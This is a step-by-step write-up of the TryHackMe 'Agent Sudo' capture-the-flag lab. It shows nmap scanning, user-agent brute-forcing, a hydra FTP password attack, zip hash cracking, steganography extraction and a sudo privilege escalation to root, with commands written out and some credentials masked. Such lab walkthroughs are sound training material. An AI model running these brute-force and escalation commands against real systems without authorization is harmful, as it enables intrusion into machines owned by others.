Agent Sudo CTF — TryHackMe Writup
You found a secret server located deep under the sea. Your mission? Hack inside the server and reveal the hidden truth. This walkthrough will guide you through the process step-by-step, from enumeration to privilege escalation.
0. Enumeration
Target IP:
To start, I ran an Nmap scan on the target, revealing three open ports:
nmap -v
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Homepage Clue
revealed the following message:
Dear agents,
Use your own codename as user-agent to access the site.
Agent R
The codename likely refers to a user-agent string, possibly one of the alphabet (Agent A to Z). To test this hypothesis, I used Burp Suite's Intruder to brute-force user-agent strings.
Using Burp Suite
I have inserted payload in user-agent from A to Z, and forwarded through intruder.
Response length for C and R are different, for C less and for R more. By analyzing I found R have much content as
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
Dear agents,
Use your own <b>codename</b> as user-agent to access the site.
Agent R
But in case of C, there is status code `302` and the location is `Location: agent_C_attention.php`
Now visit the location we found,
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
Agent R
The agent name is `chris` and it says the password is weak.
1. Attacking
Lets try out password crack for user cheris in FTP. We will use hydra for attack and rockyou.txt for password list.
FTP Login
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp
After the successful login to FTP, we got
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
All the files are download by simply `get` command.
The message says that the password is stored inside the image. So need to apply the concept to steganography.
❯ cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
Agent C
Now, using `binwalk` and getting info if found.
❯ binwalk cute-alien.jpg
0 0x0 JPEG image data, JFIF standard 1.01
❯ binwalk cutie.png
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
Now extracting the cutie.png using `binwalk -e cutie.png` we have 365, 365.zlib and files, zip is important and is password protected.
I used John the Ripper to crack the zip’s password. First creating hash by and then cracking the hash as
❯ zip2john > zip_pass.hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt zip_pass.hash
Press 'q' or Ctrl-C to abort, almost any other key for status
ali** (
1g 0:00:00:00 DONE (2024-10-08 17:45) 1.162g/s 28576p/s 28576c/s 28576C/s christal..280789
Session completed
Now we have zip password, extract it. Was a message:
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
Agent R
Here `QXJlYTUx` is encoded, lets decode using base64 as
echo 'QXJlYTUx' | base64 -d
Now look into cute-alien.jpg, using `steghide`. After the command `steghide — info cute-alien.jpg`, we found that the `message.txt` file is embedded there.
Finally, using steghide, I extracted the hidden message from cute-alien.jpg
steghide --extract -sf cute-alien.jpg
❯ cat message.txt
Hi jam**,
Glad you find this message. Your login password is hacker******
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
2. Capture the Flag
I used the credentials to SSH into the server:
ssh jam**@
After logging in, I captured the user flag.
To know the incident of the photo `Alien_autospy.jpg` we need to download (maybe using scp) and search on google as
scp jam**@**/Alien_autospy.jpg .
By searching we found the image from `Roswell`
3. Privilege Escalation
Running sudo -l
revealed that the user could run /bin/bash
as sudo.
The sudo version (1.8.21p2
) was vulnerable to CVE-2019-14***. Using an exploit from Exploit-DB, I escalated privileges to root:
sudo ***** /bin/bash
After successfully gaining root access, I retrieved the root flag.
Final message from Agent R is
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Des*** a.k.a Agent R
This was a fun and insightful challenge that covered enumeration, brute-forcing, steganography, and privilege escalation.
Happy hackers! Happy Hacking!!